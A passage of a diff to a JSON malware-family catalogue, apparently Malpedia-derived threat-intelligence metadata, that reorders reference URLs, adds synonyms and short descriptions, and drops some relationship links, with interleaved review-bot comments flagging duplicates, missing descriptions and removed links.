"https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media",
+ "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897",
"https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
"https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain",
"https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html"
@@ -44117,25 +46470,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc",
- "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
- "https://news.sophos.com/en-us/2020/12/16/systembc/",
"https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
- "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
"https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://asec.ahnlab.com/en/33600/",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
"https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/",
"https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
"https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
"https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://news.sophos.com/en-us/2020/12/16/systembc/",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://asec.ahnlab.com/en/33600/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a"
],
"synonyms": [
"Coroxy"
@@ -44150,10 +46507,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel",
"https://www.secureworks.com/research/srizbi",
"https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html",
- "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel"
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
],
"synonyms": [],
"type": []
@@ -44171,15 +46528,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d5a4cbe7-81c9-4a52-80ee-07ca3f625844",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145",
"value": "TabMsgSQL"
},
@@ -44188,15 +46536,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
- "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
+ "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a",
"https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat",
- "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
"https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
"http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html",
+ "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
"https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1"
],
"synonyms": [
@@ -44204,15 +46552,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "cda7d605-23d0-4f93-a585-1276f094c04a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "94323b32-9566-450b-8480-5f9f53b57948",
"value": "taidoor"
},
@@ -44235,8 +46574,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret",
- "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html",
- "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html"
+ "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
+ "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html"
],
"synonyms": [],
"type": []
@@ -44265,15 +46604,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "b7b4c682-090b-4da2-abc2-541fd3157579",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410",
"value": "Tapaoux"
},
@@ -44282,12 +46612,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany",
- "https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/",
"https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-targetcompany-ransomware-victims/",
+ "https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/",
+ "https://securityaffairs.co/wordpress/127761/malware/targetcompany-ransomware-decryptor.html",
+ "https://www.sangfor.com/blog/cybersecurity/new-threat-mallox-ransomware",
"https://id-ransomware.blogspot.com/2021/06/tohnichi-ransomware.html",
- "https://securityaffairs.co/wordpress/127761/malware/targetcompany-ransomware-decryptor.html"
+ "https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/",
+ "https://asec.ahnlab.com/en/39152/"
],
"synonyms": [
+ "Fargo",
+ "Mallox",
"Tohnichi"
],
"type": []
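Review bot: adding `Fargo` and `Mallox` as synonyms of TargetCompany is useful for matching, but synonyms are also used for lookup, so please check that no other cluster in the galaxy already carries either name as its `value` or as a synonym; a name present in two clusters makes tagging ambiguous.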
@@ -44313,12 +46648,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer",
- "https://www.zscaler.com/blogs/research/taurus-new-stealer-town",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://blog.minerva-labs.com/taurus-stealers-evolution",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/agentvx-and-taurus/",
"https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
"https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
- "https://blog.minerva-labs.com/taurus-stealers-evolution"
+ "https://www.zscaler.com/blogs/research/taurus-new-stealer-town",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
],
"synonyms": [],
"type": []
@@ -44342,13 +46678,14 @@
"value": "TClient"
},
{
- "description": "",
+ "description": "F-Secure described tDiscoverer (also known as HammerDuke) as interesting because it is written in .NET, and even more so because of its occasional use of Twitter as a C&C communication channel. Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands, but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date. If the account exists, HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer",
+ "https://securityintelligence.com/hammertoss-what-me-worry/",
"https://www.youtube.com/watch?v=UE9suwyuic8",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf",
- "https://securityintelligence.com/hammertoss-what-me-worry/"
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"
],
"synonyms": [
"HAMMERTOSS",
@@ -44393,9 +46730,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy",
"https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
- "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent",
+ "https://www.deepinstinct.com/blog/the-russian-spyagent-a-decade-later-and-rat-tools-remain-at-risk",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging",
"https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging"
+ "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent"
],
"synonyms": [
"TVRAT",
@@ -44412,51 +46750,42 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop",
- "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
+ "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
"https://www.brighttalk.com/webcast/7451/462719",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
+ "https://github.com/fireeye/sunburst_countermeasures",
"https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
- "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
+ "https://twitter.com/TheEnergyStory/status/1346096298311741440",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b",
"https://twitter.com/craiu/status/1339954817247158272",
"https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
- "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://github.com/fireeye/sunburst_countermeasures",
- "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
- "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
- "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
- "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
- "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
- "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
"https://www.youtube.com/watch?v=LA-XE5Jy2kU",
"https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
+ "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
"https://www.youtube.com/watch?v=GfbxHy6xnbA",
- "https://twitter.com/TheEnergyStory/status/1346096298311741440",
+ "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
+ "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
+ "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
"https://twitter.com/TheEnergyStory/status/1342041055563313152",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b"
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
+ "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "aba3fd7d-87cc-4266-82a1-d458ae299266",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "efa01fef-7faf-4bb2-8630-b3a237df882a",
"value": "TEARDROP"
},
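Review bot: the `related` array is dropped from TEARDROP (the `similar` link to dest-uuid aba3fd7d-87cc-4266-82a1-d458ae299266) with nothing replacing it in this hunk, and the same removal happens for Tinba, TinyTyphon and TinyZbot further down; the refs changes in this hunk are otherwise a pure reorder, since every removed URL reappears. Please state in the commit message whether these relationships are intentionally dropped or are now maintained elsewhere, because consumers that pivot on `related` will silently lose the link.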
@@ -44504,11 +46833,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine",
- "https://www.secureworks.com/research/threat-profiles/iron-viking"
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks"
],
"synonyms": [],
"type": []
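Review bot: the last two refs in the TeleBots list are the same welivesecurity article with and without a trailing slash (`.../rise-telebots-analyzing-disruptive-killdisk-attacks/` and `.../rise-telebots-analyzing-disruptive-killdisk-attacks`); since the hunk already rewrites both lines, keep a single entry rather than carrying the duplicate forward.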
@@ -44521,9 +46850,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor",
- "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html",
"https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/"
+ "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html"
],
"synonyms": [],
"type": []
@@ -44544,13 +46873,39 @@
"uuid": "48352761-a92f-43b4-931d-249ac9eae8b2",
"value": "TelegramGrabber"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telemiris",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f39400a3-3b27-4dc6-bccd-aa277ca99f28",
+ "value": "Telemiris"
+ },
+ {
+ "description": "Cisco Talos reports that this is a data exfiltration tool used by TA505.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b6a2a1ea-6cdb-4cbd-a9a6-539c7db1c6de",
+ "value": "Teleport"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/"
+ "https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks"
],
"synonyms": [],
"type": []
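Review bot: the new Telemiris entry ships with `"description": ""` although the securelist ref it cites describes the tool, while the neighbouring new entries (Teleport in this hunk, TempStealer and TitanStealer below) each get a one-line description; add a similar attributed one-liner ("According to ...") for Telemiris so the entry is usable without following the link.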
@@ -44570,15 +46925,28 @@
"uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74",
"value": "Tempedreve"
},
+ {
+ "description": "According to Cyble, this is a stealer targeting several crypto currency wallets along browser data.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer",
+ "https://blog.cyble.com/2022/10/20/infostealer-distributed-using-bundled-installer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a27b7e55-6036-4c4a-96b2-0a99df878fe0",
+ "value": "TempStealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat",
- "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf",
- "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
"https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf",
- "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html"
+ "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
+ "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf"
],
"synonyms": [
"Fakem RAT"
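Review bot: the TempStealer description has a grammar slip: `"According to Cyble, this is a stealer targeting several crypto currency wallets along browser data."` should read "... several cryptocurrency wallets along with browser data."; the Terminator RAT part of the hunk is a reorder only.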
@@ -44593,9 +46961,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.termite",
- "https://www.alienvault.com/blogs/labs-research/internet-of-termites",
+ "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
"https://www.mandiant.com/resources/evolution-of-fin7",
- "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/"
+ "https://www.alienvault.com/blogs/labs-research/internet-of-termites"
],
"synonyms": [],
"type": []
@@ -44608,6 +46976,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter",
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
"https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
],
"synonyms": [],
@@ -44622,8 +46992,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader",
"https://medium.com/walmartglobaltech/a-re-look-at-the-terraloader-dropper-dll-e5947ad6e244",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-"
+ "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-",
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
],
"synonyms": [],
"type": []
@@ -44652,12 +47025,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer",
- "https://github.com/eset/malware-ioc/tree/master/evilnum",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
- "https://twitter.com/3xp0rtblog/status/1275746149719252992",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
"https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://twitter.com/3xp0rtblog/status/1275746149719252992",
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
],
"synonyms": [
"SONE",
@@ -44674,10 +47047,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
"https://blog.minerva-labs.com/taurus-user-guided-infection",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9"
],
"synonyms": [
"Taurus Loader TeamViewer Module"
@@ -44692,17 +47065,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt",
- "https://community.riskiq.com/article/30f22a00",
- "https://blogs.cisco.com/security/talos/teslacrypt",
- "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/",
- "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/",
- "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla",
"https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/",
+ "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla",
"https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/",
- "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack",
- "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/",
+ "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/",
+ "https://blogs.cisco.com/security/talos/teslacrypt",
+ "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/",
+ "https://community.riskiq.com/article/30f22a00",
"https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
- "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/"
+ "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf",
+ "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack"
],
"synonyms": [
"cryptesla"
@@ -44717,8 +47090,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower",
- "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign",
"https://www.sygnia.co/mata-framework",
+ "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign",
"https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/"
],
"synonyms": [],
@@ -44747,8 +47120,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom",
- "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/",
"https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html",
+ "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/",
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/"
],
"synonyms": [],
@@ -44801,15 +47174,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
